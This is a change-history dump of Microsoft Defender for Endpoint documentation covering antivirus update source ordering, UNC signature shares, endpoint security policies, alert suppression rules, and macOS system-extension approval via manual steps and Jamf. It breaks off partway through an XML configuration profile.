-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-
-## Related articles
--- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)-- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)-- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)-- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10 and 11](microsoft-defender-antivirus-in-windows-10.md)
security Manage Protection Updates Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus.md
- Title: Manage how and where Microsoft Defender Antivirus receives updates
-description: Manage the fallback order for how Microsoft Defender Antivirus receives protection updates.
----------- m365-security-- tier2 Previously updated : 04/08/2024--
-# Manage the sources for Microsoft Defender Antivirus protection updates
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-<a id="protection-updates"></a>
-<!-- this has been used as anchor in VDI content -->
-
-Keeping your antivirus protection up to date is critical. There are two components to managing protection updates for Microsoft Defender Antivirus:
--- *Where* the updates are downloaded from; and-- *When* updates are downloaded and applied.-
-This article describes how to specify from where updates should be downloaded (this specification is also known as the fallback order). See [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md) article for an overview on how updates work, and how to configure other aspects of updates (such as scheduling updates).
-
-> [!IMPORTANT]
-> Microsoft Defender Antivirus Security intelligence updates and platform updates are delivered through Windows Update and starting Monday, October 21, 2019, all security intelligence updates are SHA-2 signed exclusively. Your devices must be updated to support SHA-2 in order to update your security intelligence. To learn more, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](https://support.microsoft.com/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus).
-
-<a id="fallback-order"></a>
-
-## Fallback order
-
-Typically, you configure endpoints to individually download updates from a primary source followed by other sources in order of priority, based on your network configuration. Updates are obtained from sources in the order you specify. If updates from the current source are out-of-date, the next source in the list is used immediately.
-
-When updates are published, some logic is applied to minimize the size of the update. In most cases, only the differences between the latest update and the update that is currently installed (the set of differences is referred to as the delta) on the device is downloaded and applied. However, the size of the delta depends on two main factors:
--- The age of the last update on the device; and-- The source used to download and apply updates.-
-The older the updates on an endpoint, the larger the download is. However, you must also consider download frequency as well. A more frequent update schedule can result in more network usage, whereas a less-frequent schedule can result in larger file sizes per download.
-
-There are five locations where you can specify where an endpoint should obtain updates:
--- [Microsoft Update](https://support.microsoft.com/help/12373/windows-update-faq)-- [Windows Server Update Service](/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus) (See note 1 below) -- [Microsoft Endpoint Configuration Manager](/configmgr/core/servers/manage/updates)-- [Network file share](#unc-share)-- [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft anti-malware](/microsoft-365/security/defender-endpoint/manage-protection-update-schedule-microsoft-defender-antivirus) (See note 2 below)-
-> [!NOTE]
-> 1. Intune Internal Definition Update Server. If you use SCCM/SUP to get definition updates for Microsoft Defender Antivirus, and you must access Windows Update on blocked client devices, you can transition to co-management and offload the endpoint protection workload to Intune. In the antimalware policy configured in Intune there is an "internal definition update server" option that you can set to use on-premises WSUS as the update source. This configuration helps you control which updates from the official WU server are approved for the enterprise, and also helps proxy and save network traffic to the official Windows Updates network.
->
-> 2. Your policy and registry might have this listed as Microsoft Malware Protection Center (MMPC) security intelligence, its former name.
-
-To ensure the best level of protection, Microsoft Update allows for rapid releases, which means smaller downloads on a frequent basis. The Windows Server Update Service, Microsoft Endpoint Configuration Manager, Microsoft security intelligence updates, and platform updates sources deliver less frequent updates. Thus, the delta might be larger, resulting in larger downloads.
-
-Platform updates and engine updates are released on a monthly cadence. Security intelligence updates are delivered multiple times a day, but this delta package doesn't contain an engine update. See [Microsoft Defender Antivirus security intelligence and product updates](microsoft-defender-antivirus-updates.md).
--
-> [!IMPORTANT]
-> If you have set [Microsoft Security intelligence page](https://www.microsoft.com/security/portal/definitions/adl.aspx) updates as a fallback source after Windows Server Update Service or Microsoft Update, updates are only downloaded from security intelligence updates and platform updates when the current update is considered out-of-date. (By default, this is seven consecutive days of not being able to apply updates from the Windows Server Update Service or Microsoft Update services).
-> You can, however, [set the number of days before protection is reported as out-of-date](/microsoft-365/security/defender-endpoint/manage-outdated-endpoints-microsoft-defender-antivirus).<p>
-> Starting Monday, October 21, 2019, security intelligence updates and platform updates are SHA-2 signed exclusively. Devices must be updated to support SHA-2 in order to get the latest security intelligence updates and platform updates. To learn more, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](https://support.microsoft.com/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus).
-
-Each source has typical scenarios that depend on how your network is configured, in addition to how often they publish updates, as described in the following table:
-
-|Location|Sample scenario|
-|||
-|Windows Server Update Service|You're using Windows Server Update Service to manage updates for your network.|
-|Microsoft Update|You want your endpoints to connect directly to Microsoft Update. This option is useful for endpoints that irregularly connect to your enterprise network, or if you don't use Windows Server Update Service to manage your updates.|
-|File share|You have non-Internet-connected devices (such as VMs). You can use your Internet-connected VM host to download the updates to a network share, from which the VMs can obtain the updates. See the [VDI deployment guide](deployment-vdi-microsoft-defender-antivirus.md) for how file shares are used in virtual desktop infrastructure (VDI) environments.|
-|Microsoft Configuration Manager|You're using Microsoft Configuration Manager to update your endpoints.|
-|Security intelligence updates and platform updates for Microsoft Defender Antivirus and other Microsoft anti-malware (formerly referred to as MMPC)|[Make sure your devices are updated to support SHA-2](https://support.microsoft.com/help/4472027/2019-sha-2-code-signing-support-requirement-for-windows-and-wsus). Microsoft Defender Antivirus Security intelligence and platform updates are delivered through Windows Update, and starting Monday October 21, 2019 security intelligence updates and platform updates are SHA-2 signed exclusively. <br/>Download the latest protection updates because of a recent infection or to help provision a strong, base image for [VDI deployment](deployment-vdi-microsoft-defender-antivirus.md). This option should generally be used only as a final fallback source, and not the primary source. It's only be used if updates can't be downloaded from Windows Server Update Service or Microsoft Update for [a specified number of days](/microsoft-365/security/defender-endpoint/manage-outdated-endpoints-microsoft-defender-antivirus#set-the-number-of-days-before-protection-is-reported-as-out-of-date).|
-
-You can manage the order in which update sources are used with Group Policy, Microsoft Endpoint Configuration Manager, PowerShell cmdlets, and WMI.
-
-> [!IMPORTANT]
-> If you set Windows Server Update Service as a download location, you must approve the updates, regardless of the management tool you use to specify the location. You can set up an automatic approval rule with Windows Server Update Service, which might be useful as updates arrive at least once a day. To learn more, see [synchronize endpoint protection updates in standalone Windows Server Update Service](/configmgr/protect/deploy-use/endpoint-definitions-wsus#to-synchronize-endpoint-protection-definition-updates-in-standalone-wsus).
-
-The procedures in this article first describe how to set the order, and then how to set up the **File share** option if you have enabled it.
-
-## Use Group Policy to manage the update location
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and then select **Edit**.
-
-2. In the **Group Policy Management Editor**, go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Windows Defender** \> **Signature updates** and then configure the following settings:
-
- 1. Edit the **Define the order of sources for downloading security intelligence updates** setting. Set the option to **Enabled**.
-
- 2. Specify the order of sources, separated by a single pipe, for example: `InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC`, as shown in the following screenshot.
-
- :::image type="content" source="../../media/wdav-order-update-sources.png" alt-text="Group policy setting listing the order of sources" lightbox="../../media/wdav-order-update-sources.png":::
-
- 3. Select **OK**. This action sets the order of protection update sources.
-
- 4. Edit the **Define file shares for downloading security intelligence updates** setting and then set the option to **Enabled**.
-
- 5. Specify the file share source. If you have multiple sources, specify each source in the order they should be used, separated by a single pipe. Use [standard UNC notation](/openspecs/windows_protocols/ms-dtyp/62e862f4-2a51-452e-8eeb-dc4ff5ee33cc) for denoting the path, for example: `\\host-name1\share-name\object-name|\\host-name2\share-name\object-name`. If you don't enter any paths, then this source is skipped when the VM downloads updates.
-
- 6. Select **OK**. This action sets the order of file shares when that source is referenced in the **Define the order of sources...** group policy setting.
-
-> [!NOTE]
-> For Windows 10, versions 1703 up to and including 1809, the policy path is **Windows Components > Microsoft Defender Antivirus > Signature Updates**
-> For Windows 10, version 1903, the policy path is **Windows Components > Microsoft Defender Antivirus > Security Intelligence Updates**
-
-## Use Configuration Manager to manage the update location
-
-See [Configure Security intelligence Updates for Endpoint Protection](/configmgr/protect/deploy-use/endpoint-definition-updates) for details on configuring Microsoft Configuration Manager (current branch).
-
-## Use PowerShell cmdlets to manage the update location
-
-Use the following PowerShell cmdlets to set the update order.
-
-```PowerShell
-Set-MpPreference -SignatureFallbackOrder {LOCATION|LOCATION|LOCATION|LOCATION}
-Set-MpPreference -SignatureDefinitionUpdateFileSharesSource {\\UNC SHARE PATH|\\UNC SHARE PATH}
-```
-
-See the following articles for more information:
--- [Set-MpPreference -SignatureFallbackOrder](/powershell/module/defender/set-mppreference)-- [Set-MpPreference -SignatureDefinitionUpdateFileSharesSource](/powershell/module/defender/set-mppreference#-signaturedefinitionupdatefilesharessources)-- [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md)-- [Defender Antivirus cmdlets](/powershell/module/defender/index)-
-## Use Windows Management Instruction (WMI) to manage the update location
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-SignatureFallbackOrder
-SignatureDefinitionUpdateFileSharesSource
-```
-
-See the following articles for more information:
--- [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)-
-## Use Mobile Device Management (MDM) to manage the update location
-
-See [Policy CSP - Defender/SignatureUpdateFallbackOrder](/windows/client-management/mdm/policy-csp-defender#defender-signatureupdatefallbackorder) for details on configuring MDM.
-
-## What if we're using a third-party vendor?
-
-This article describes how to configure and manage updates for Microsoft Defender Antivirus. However, you can hire third-party vendors to perform these tasks.
-
-For example, suppose that Contoso has hired Fabrikam to manage their security solution, which includes Microsoft Defender Antivirus. Fabrikam typically uses [Windows Management Instrumentation](./use-wmi-microsoft-defender-antivirus.md), [PowerShell cmdlets](./use-powershell-cmdlets-microsoft-defender-antivirus.md), or [Windows command-line](./command-line-arguments-microsoft-defender-antivirus.md) to deploy patches and updates.
-
-> [!NOTE]
-> Microsoft does not test third-party solutions for managing Microsoft Defender Antivirus.
-
-<a id="unc-share"></a>
-
-## Create a UNC share for security intelligence and platform updates
-
-Set up a network file share (UNC/mapped drive) to download security intelligence and platform updates from the MMPC site by using a scheduled task.
-
-1. On the system for which you want to provision the share and download the updates, create a folder for the script.
-
- ```console
- Start, CMD (Run as admin)
- MD C:\Tool\PS-Scripts\
- ```
-
-2. Create a folder for signature updates.
-
- ```console
- MD C:\Temp\TempSigs\x64
- MD C:\Temp\TempSigs\x86
- ```
-
-3. Download the PowerShell script from [www.powershellgallery.com/packages/SignatureDownloadCustomTask/1.4](https://www.powershellgallery.com/packages/SignatureDownloadCustomTask/1.4).
-
-4. Select **Manual Download**.
-
-5. Select **Download the raw nupkg file**.
-
-6. Extract the file.
-
-7. Copy the file `SignatureDownloadCustomTask.ps1` to the folder you previously created, `C:\Tool\PS-Scripts\` .
-
-8. Use the command line to set up the scheduled task.
-
- > [!NOTE]
- > There are two types of updates: full and delta.
-
- - For x64 delta:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $true -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x64 full:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x64 -isDelta $false -destDir C:\Temp\TempSigs\x64 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x86 delta:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $true -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- - For x86 full:
-
- ```powershell
- Powershell (Run as admin)
-
- C:\Tool\PS-Scripts\
-
- ".\SignatureDownloadCustomTask.ps1 -action create -arch x86 -isDelta $false -destDir C:\Temp\TempSigs\x86 -scriptPath C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1 -daysInterval 1"
- ```
-
- > [!NOTE]
- > When the scheduled tasks are created, you can find these in the Task Scheduler under `Microsoft\Windows\Windows Defender`.
-
-9. Run each task manually and verify that you have data (`mpam-d.exe`, `mpam-fe.exe`, and `nis_full.exe`) in the following folders (you might have chosen different locations):
-
- - `C:\Temp\TempSigs\x86`
- - `C:\Temp\TempSigs\x64`
-
- If the scheduled task fails, run the following commands:
-
- ```console
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $False -destDir C:\Temp\TempSigs\x64"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x64 -isDelta $True -destDir C:\Temp\TempSigs\x64"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $False -destDir C:\Temp\TempSigs\x86"
-
- C:\windows\system32\windowspowershell\v1.0\powershell.exe -NoProfile -executionpolicy allsigned -command "&\"C:\Tool\PS-Scripts\SignatureDownloadCustomTask.ps1\" -action run -arch x86 -isDelta $True -destDir C:\Temp\TempSigs\x86"
- ```
-
-10. Create a share pointing to `C:\Temp\TempSigs` (for example, `\\server\updates`).
-
- > [!NOTE]
- > At a minimum, authenticated users must have "Read" access. This requirement also applies to domain computers, the share, and NTFS (security).
-
-11. Set the share location in the policy to the share.
-
- > [!NOTE]
- > Do not add the x64 (or x86) folder in the path. The mpcmdrun.exe process adds it automatically.
---
-## Related articles
--- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)-- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)-- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)-- [Manage updates for mobile devices and VMs](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)---
security Manage Security Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-security-policies.md
- Title: Manage endpoint security policies in Microsoft Defender for Endpoint
-description: Learn how to set windows, mac, and linux endpoint security policies such as antivirus, firewall, endpoint detection and response in Microsoft Defender for Endpoint.
------- m365-security-- tier2- Previously updated : 12/14/2023--
-# Manage endpoint security policies in Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-Use security policies to manage security settings on devices. As a security administrator, you can configure security policy settings in Microsoft Defender XDR.
-
-You'll find endpoint security policies under **Endpoints > Configuration management > Endpoint security policies**.
-
-> [!NOTE]
-> The **Endpoint Security Policies** page in Microsoft Defender XDR is available only for [users with the security administrator role in Microsoft Defender XDR](/microsoft-365/security/defender-endpoint/assign-portal-access). Any other user role, such as Security Reader, cannot access the portal. When a user has the required permissions to view policies in the Microsoft Defender portal, the data is presented based on Intune permissions. If the user is in scope for Intune role-based access control, it applies to the list of policies presented in the Microsoft Defender portal. We recommend granting security administrators with the [Intune built-in role, "Endpoint Security Manager"](/mem/intune/fundamentals/role-based-access-control#built-in-roles) to effectively align the level of permissions between Intune and Microsoft Defender XDR.
--
-The following list provides a brief description of each endpoint security policy type:
--- **Antivirus** - Antivirus policies help security admins focus on managing the discrete group of antivirus settings for managed devices. --- **Disk encryption** - Endpoint security disk encryption profiles focus on only the settings that are relevant for a devices built-in encryption method, like FileVault or BitLocker. This focus makes it easy for security admins to manage disk encryption settings without having to navigate a host of unrelated settings.--- **Firewall** - Use the endpoint security Firewall policy in Intune to configure a devices built-in firewall for devices that run macOS and Windows 10/11.--- **Endpoint detection and response** - When you integrate Microsoft Defender for Endpoint with Intune, use the endpoint security policies for endpoint detection and response (EDR) to manage the EDR settings and onboard devices to Microsoft Defender for Endpoint.--- **Attack surface reduction** - When Microsoft Defender Antivirus is in use on your Windows 10/11 devices, use Intune endpoint security policies for attack surface reduction to manage those settings for your devices.--
-## Create an endpoint security policy
-
->[!NOTE]
->Currently, only antivirus policies are supported.
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using at least a security admin role.
-
-2. Select **Endpoints > Configuration management > Endpoint security policies** and then select **Create new Policy**.
--
-3. Select a platform from the dropdown list.
-
-4. Select a template, then select **Create policy**.
--
-5. On the **Basics** page, enter a name and description for the profile, then choose **Next**.
-
-6. On the **Settings** page, expand each group of settings, and configure the settings you want to manage with this profile.
-
- When you're done configuring settings, select **Next**.
-
-7. On the **Assignments** page, select the groups that will receive this profile.
-
- Select **Next**.
-
-8. On the **Review + create** page, when you're done, select **Save**. The new profile is displayed in the list when you select the policy type for the profile you created.
--
->[!NOTE]
->To edit the scope tags, you'll need to go to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431).
--
-## To edit an endpoint security policy
-
-1. Select the new policy, and then select **Edit**.
-
-2. Select **Settings** to expand a list of the configuration settings in the policy. You can't modify the settings from this view, but you can review how they're configured.
-
-3. To modify the policy, select **Edit** for each category where you want to make a change:
- - Basics
- - Settings
- - Assignments
-
-4. After you've made changes, select **Save** to save your edits. Edits to one category must be saved before you can introduce edits to additional categories.
----
-## Verify endpoint security policies
-
-To verify that you have successfully created a policy, select a policy name from the list of endpoint security policies.
-
->[!NOTE]
->It can take up to 90 minutes for a policy to reach a device. To expedite the process, for devices Managed by Defender for Endpoint, you can select **Policy sync** from the actions menu so that it is applied in approximately 10 minutes.
-> :::image type="content" source="./media/policy-sync.png" alt-text="Image showing policy sync button":::
-
-The policy page displays details that summarize the status of the policy. You can view a policy's status, which devices it has been applied to, and assigned groups.
-
-During an investigation, you can also view the **Security policies** tab in the device page to view the list of policies that are being applied to a particular device. For more information, see [Investigating devices](investigate-machines.md#security-policies).
------
security Manage Suppression Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-suppression-rules.md
- Title: Manage Microsoft Defender for Endpoint suppression rules
-description: You might need to prevent alerts from appearing in the portal by using suppression rules. Learn how to manage your suppression rules in Microsoft Defender for Endpoint.
------- m365-security-- tier2-- Previously updated : 12/18/2020--
-# Manage suppression rules
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
--
-There might be scenarios where you need to suppress alerts from appearing in the portal. You can create suppression rules for specific alerts that are known to be innocuous such as known tools or processes in your organization. For more information on how to suppress alerts, see [Suppress alerts](manage-alerts.md).
-
-You can view a list of all the suppression rules and manage them in one place. You can also turn an alert suppression rule on or off.
--
-1. Log in to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
-
-2. Select a rule by clicking on the check-box beside the rule name.
-
-3. Click **Turn rule on**, **Edit rule**, or **Delete rule**. When making changes to a rule, you can choose to release alerts that it has already suppressed, regardless whether or not these alerts match the new criteria.
--
-## View details of a suppression rule
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Alert suppression**. The list of suppression rules that users in your organization have created is displayed.
-
-2. Click on a rule name. Details of the rule is displayed. You'll see the rule details such as status, scope, action, number of matching alerts, created by, and date when the rule was created. You can also view associated alerts and the rule conditions.
-
-## Related topics
--- [Manage alerts](manage-alerts.md)
security Manage Sys Extensions Manual Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-sys-extensions-manual-deployment.md
- Title: Manage system extensions using the manual methods of deployment
-description: Manage system extensions using the manual methods of deployment.
------- m365-security-- tier3-- Previously updated : 08/28/2023--
-# Manage system extensions using the manual methods of deployment
-
-This article describes the procedures involved when deploying Microsoft Defender for Endpoint manually.
-
-## Manual deployment
-
-### System Extensions
-
-You might see the prompt that's shown in the following screenshot:
--
-1. Select **OK**. You might get a second prompt as shown in the following screenshot:
-
- :::image type="content" source="media/system-extension-blocked-second-prompt.png" alt-text="The second prompt regarding system extensions being blocked." lightbox="media/system-extension-blocked-second-prompt.png":::
-
-1. From this second-prompt screen, select **OK**. You'll receive a notification message that reads **Installation succeeded**, as shown in the following screenshot:
-
- :::image type="content" source="media/installation-succeeded-notification-message.png" alt-text="The screen displaying the installation succeeded notification message." lightbox="media/installation-succeeded-notification-message.png":::
-
-1. On the screen displaying the **Installation succeeded** notification message, select **OK**. You'll return to the following screen:
-
- :::image type="content" source="medie-menu.png":::
-
-1. From the menu bar, click the **x** symbol on the shield. You'll get the options shown in the following screenshot:
-
- :::image type="content" source="media/options-on-clicking-x-symbol.png" alt-text="The screen on clicking the x symbol in the shield." lightbox="media/options-on-clicking-x-symbol.png":::
-
-1. Select **Action needed**. The following screen appears:
-
- :::image type="content" source="media/virus-and-threat-protection-screen.png" alt-text="The Virus & threat protection screen containing the Fix button." lightbox="media/virus-and-threat-protection-screen.png":::
-
-1. Click **Fix** on the top-right corner of this screen. You'll get a prompt, as shown in the following screenshot:
-
- :::image type="content" source="media/prompt-on-virus-and-threat-protection-screen.png" alt-text="The prompt dialog box on the Virus & threat protection screen." lightbox="media/prompt-on-virus-and-threat-protection-screen.png":::
-
-1. Enter your password and select **OK**.
-1. Click
- :::image type="content" source="media/system-preferences-icon.png" alt-text="The System Preferences icon." lightbox="media/system-preferences-icon.png":::
-
- The **System Preferences** screen appears.
-
- :::image type="content" source="media/system-preferences-screen.png" alt-text="The System Preferences screen." lightbox="media/system-preferences-screen.png":::
-
-1. Click **Security & Privacy**. The **Security & Privacy** screen appears.
-
- :::image type="content" source="media/security-and-privacy-screen.png" alt-text="The Security & Privacy screen." lightbox="media/security-and-privacy-screen.png":::
-
-1. Select **Click the lock to make changes**. You'll get a prompt as shown in the following screenshot:
-
- :::image type="content" source="media/prompt-on-security-and-privacy-screen.png" alt-text="The prompt on the Security & Privacy screen." lightbox="media/prompt-on-security-and-privacy-screen.png":::
-
-1. Enter your password and click **Unlock**. The following screen appears:
-
- :::image type="content" source="media/screen-on-clicking-unlock.png" alt-text="The screen that is displayed on clicking Unlock." lightbox="media/screen-on-clicking-unlock.png":::
-
-1. Select **Details**, next to **Some software system requires your attention before it can be used**.
-
- :::image type="content" source="media/screen-on-clicking-details.png" alt-text="The screen that is displayed on clicking Details." lightbox="media/screen-on-clicking-details.png":::
-
-1. Check both the **Microsoft Defender** checkboxes, and select **OK**. You'll get two pop-up screens, as shown in the following screenshot:
-
- :::image type="content" source="medi-checkboxes.png":::
-
-1. On the **"Microsoft Defender" Would like to Filter Network Content** pop-up screen, click **Allow**.
-
-1. On the **Microsoft Defender wants to make changes** pop-up screen, enter your password and select **OK**.
-
-If you run systemextensionsctl list, the following screen appears:
--
-### Accessibility
-
-1. On the **Security & Privacy** screen, select the **Privacy** tab.
-
- :::image type="content" source="media/privacy-tab.png" alt-text="The Privacy tab." lightbox="media/privacy-tab.png":::
-
-2. Select **Accessibility** from the left navigation pane, and click **+**.
-
- :::image type="content" source="media/accessibility-and-plus-icon.png" alt-text="The Accessibility menu item and the Plus icon." lightbox="media/accessibility-and-plus-icon.png":::
-
-3. From the resultant screen, select **Applications** from the **Favorites** pane in the left-side of the screen; select **Microsoft Defender**; and then select **Open** at the bottom-right of the screen.
-
- :::image type="content" source="medi-options.png":::
-
-4. From the resultant screen, check the **Microsoft Defender** checkbox.
-
- :::image type="content" source="medi-checkbox.png":::
-
-### Full Disk Access
-
-1. On the **Security & Privacy** screen, select the **Privacy** tab.
-1. Select **Full Disk Access** from the left navigation pane, and then click the **Lock** icon.
-
- :::image type="content" source="media/full-disk-access-and-lock-icon.png" alt-text="The Full Disk Access option in the menu and the Lock icon." lightbox="media/full-disk-access-and-lock-icon.png":::
-
-1. Confirm that the Microsoft Defender extension has full disk access; if not, check the **Microsoft Defender** checkbox.
-
- :::image type="content" source="medi-checkbox.png":::
-
-### Notifications
-
-1. From the **System Preferences** home screen, select **Notifications**.
-
- :::image type="content" source="media/notifications-option.png" alt-text="The Notifications option in the System Preferences screen." lightbox="media/notifications-option.png":::
-
- The **Notifications** screen appears.
-
-1. Select **Microsoft Defender** from the left navigation pane.
-
-1. Enable the **Allow Notifications** option; select **Alerts**, and retain the default settings as is.
-
- :::image type="content" source="medi.png":::
-
-### What a healthy system looks like
-
-#### mdatp health output
--
-#### Check the system extensions
-
-In terminal, run the following command to check the system extensions:
-
-`systemextensionsctl list`
-
-The execution of this command is shown in the following screenshot:
-
security Manage Sys Extensions Using Jamf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-sys-extensions-using-jamf.md
- Title: Manage system extensions using Jamf
-description: Manage system extensions using Jamf for Microsoft Defender for Endpoint to work properly on macOS.
------- m365-security-- tier3-- mde-macos-- Previously updated : 02/21/2024--
-# Manage system extensions using Jamf
-
-This article describes the procedures to implement in the process of managing the system extensions to ensure Microsoft Defender for Endpoint works properly on macOS.
-
-## Jamf
-
-### Jamf System Extensions Policy
-
-To approve the system extensions, perform the following steps:
-
-1. Select **Computers > Configuration Profiles**, and then select **Options > System Extensions**.
-
-2. Select **Allowed System Extensions** from the **System Extension Types** drop-down list.
-
-3. Use **UBF8T346G9** for Team ID.
-
-4. Add the following bundle identifiers to the **Allowed System Extensions** list:
-
- - com.microsoft.wdav.epsext
- - com.microsoft.wdav.netext
-
- :::image type="content" source="media/jamf-system-extensions-approval.png" alt-text="Approving system extensions in Jamf." lightbox="media/jamf-system-extensions-approval.png":::
-
-### Privacy Preferences Policy Control (also known as Full Disk Access)
-
-Add the following Jamf payload to grant Full Disk Access to the Microsoft Defender for Endpoint Security Extension. This policy is a prerequisite for running the extension on your device.
-
-1. Select **Options > Privacy Preferences Policy Control**.
-
-2. Use **com.microsoft.wdav.epsext** as the Identifier and **Bundle ID** as Bundle type.
-
-3. Set Code Requirement to **identifier com.microsoft.wdav.epsext and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9**.
-
-4. Set **App or service** to **SystemPolicyAllFiles** and access to **Allow**.
-
- :::image type="content" source="media/privacy-preferences-policy-control.png" alt-text="Privacy preferences policy control." lightbox="media/privacy-preferences-policy-control.png":::
-
-### Network Extension Policy
-
-As part of the Endpoint Detection and Response capabilities, Microsoft Defender for Endpoint on macOS inspects socket traffic and reports this information to the Microsoft Defender portal. The following policy allows the network extension to perform this functionality:
-
-> [!NOTE]
-> Jamf doesn't have built-in support for content filtering policies, which are a prerequisite for enabling the network extensions that Microsoft Defender for Endpoint on macOS installs on the device. Furthermore, Jamf sometimes changes the content of the policies being deployed. As such, the following steps provide a workaround that involves signing the configuration profile.
-
-1. Save the following content to your device as **com.microsoft.network-extension.mobileconfig** using a text editor:
-
-```powershell
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
